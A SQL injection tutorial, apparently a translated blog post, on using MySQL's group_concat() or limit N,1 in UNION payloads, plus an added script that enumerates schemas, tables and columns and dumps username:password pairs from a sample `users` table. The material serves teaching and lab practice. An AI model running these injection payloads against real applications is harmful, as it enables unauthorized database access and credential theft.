SQL injection: the group_concat() function

group_concat() in short: it concatenates a set of values into a single string.

It is used to join the rows of a SQL result into one value. If a query returns more than one row, we need those rows concatenated so they can come back through a single column:

mysql> select schema_name from information_schema.schemata;
+--------------------+
| schema_name        |
+--------------------+
| information_schema |
| challenges         |
| mysql              |
| performance_schema |
| security           |
+--------------------+
5 rows in set (0.00 sec)

mysql> select group_concat(schema_name) from information_schema.schemata;
+-----------------------------------------------------------------+
| group_concat(schema_name)                                       |
+-----------------------------------------------------------------+
| information_schema,challenges,mysql,performance_schema,security |
+-----------------------------------------------------------------+
1 row in set (0.00 sec)
Now that we know what the function does, let's look at the injection statement. Suppose the injected value produces the following two queries (the injected UNION must return the same number of columns as the original SELECT, three here):
SELECT * FROM users WHERE id='50' union select 1,(select group_concat(schema_name) from information_schema.schemata),3;
SELECT * FROM users WHERE id='50' union select 1,(select schema_name from information_schema.schemata),3;

mysql> SELECT * FROM users WHERE id='50' union select 1,(select group_concat(schema_name) from information_schema.schemata),3;
+----+-----------------------------------------------------------------+----------+
| id | username                                                        | password |
+----+-----------------------------------------------------------------+----------+
|  1 | information_schema,challenges,mysql,performance_schema,security | 3        |
+----+-----------------------------------------------------------------+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id='50' union select 1,(select schema_name from information_schema.schemata),3;
ERROR 1242 (21000): Subquery returns more than 1 row
The second one errors straight away: a scalar subquery used as a column value may return only one row, and MySQL raises ERROR 1242 when it returns more. There are two ways around this. 1. Use limit 1. But limit 1 shows only one row, so enumerating everything means walking the result one request at a time (limit 0,1; limit 1,1; ...):
mysql> SELECT * FROM users WHERE id='50' union select 1,(select schema_name from information_schema.schemata limit 1),3;
+----+--------------------+----------+
| id | username           | password |
+----+--------------------+----------+
|  1 | information_schema | 3        |
+----+--------------------+----------+
1 row in set (0.00 sec)
2. Use group_concat, which collapses all the rows of the query into one value, so one request returns the whole list:
mysql> SELECT * FROM users WHERE id='50' union select 1,(select group_concat(schema_name) from information_schema.schemata),3;
+----+-----------------------------------------------------------------+----------+
| id | username                                                        | password |
+----+-----------------------------------------------------------------+----------+
|  1 | information_schema,challenges,mysql,performance_schema,security | 3        |
+----+-----------------------------------------------------------------+----------+
1 row in set (0.00 sec)
So whenever the subquery would return more than one row, we must use limit or group_concat, otherwise the database simply errors out. Only when the result is a single row can we do without them. That's about it.
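To make the whole procedure reproducible end to end, here is an added example in MySQL SQL (not code from the original post). It assumes a `security` database with a three-column `users` table (id, username, password), matching the column headers in the output above, and fills it with constructed sample rows. It then carries the same three-column UNION payload through the limit N,1 approach, group_concat with an explicit SEPARATOR, and on to enumerating tables, columns and row data, and ends with the group_concat_max_len truncation caveat that the page's small example does not hit.

```sql
-- Added example, not from the original post. MySQL dialect.
-- Assumed setup: database `security`, table `users` (id, username, password).
-- The two rows inserted below are constructed sample data.
CREATE DATABASE IF NOT EXISTS security;
USE security;
DROP TABLE IF EXISTS users;
CREATE TABLE users (
  id       INT PRIMARY KEY,
  username VARCHAR(64),
  password VARCHAR(64)
);
INSERT INTO users VALUES (1, 'alice', 'alice-pass'), (2, 'bob', 'bob-pass');

-- The application query with the attacker-controlled value already spliced in.
-- A payload of the form   50' union select 1,(...),3 -- -   closes the quote,
-- adds a UNION with the same column count (3) and comments out the trailing quote
-- (note the space after "--", which MySQL requires for a line comment).
-- id=50 matches nothing, so only the UNION row comes back and the injected
-- value lands in the column the application prints as `username`.

-- 1) Scalar subquery returning several rows fails with ERROR 1242 (21000).
--    Kept as a comment so this script runs through; try it interactively:
-- SELECT * FROM users WHERE id='50'
-- UNION SELECT 1,(SELECT schema_name FROM information_schema.schemata),3;

-- 2) limit N,1 walks the rows one request at a time (offset is 0-based).
SELECT * FROM users WHERE id='50'
UNION SELECT 1,(SELECT schema_name FROM information_schema.schemata LIMIT 0,1),3;
SELECT * FROM users WHERE id='50'
UNION SELECT 1,(SELECT schema_name FROM information_schema.schemata LIMIT 1,1),3;

-- 3) group_concat returns every row in a single request. An explicit SEPARATOR
--    avoids ambiguity when the values themselves may contain commas.
SELECT * FROM users WHERE id='50'
UNION SELECT 1,(SELECT group_concat(schema_name SEPARATOR '|')
                FROM information_schema.schemata),3;

-- The same pattern enumerates tables, then columns, then the data itself.
SELECT * FROM users WHERE id='50'
UNION SELECT 1,(SELECT group_concat(table_name)
                FROM information_schema.tables
                WHERE table_schema='security'),3;
SELECT * FROM users WHERE id='50'
UNION SELECT 1,(SELECT group_concat(column_name)
                FROM information_schema.columns
                WHERE table_schema='security' AND table_name='users'),3;
-- group_concat accepts several expressions and joins them per row:
-- result here is  alice:alice-pass|bob:bob-pass
SELECT * FROM users WHERE id='50'
UNION SELECT 1,(SELECT group_concat(username, ':', password SEPARATOR '|')
                FROM users),3;

-- Caveat: group_concat silently truncates its output at group_concat_max_len
-- (1024 bytes by default) and only raises a warning, so a long table or
-- column list can come back cut off. Check the limit, raise it for the session
-- if the injection point allows stacked statements, or fall back to limit N,1.
SELECT @@session.group_concat_max_len;
SET SESSION group_concat_max_len = 65535;
SHOW WARNINGS;
```

The statements after the setup are the exact queries the application would execute once the payload is spliced in; only the UNION row is returned because id=50 does not exist. If the injected value is rendered in a column with a short length or HTML-escaped output, the group_concat result can also be clipped on the application side, which is another reason to keep the limit N,1 approach in reserve.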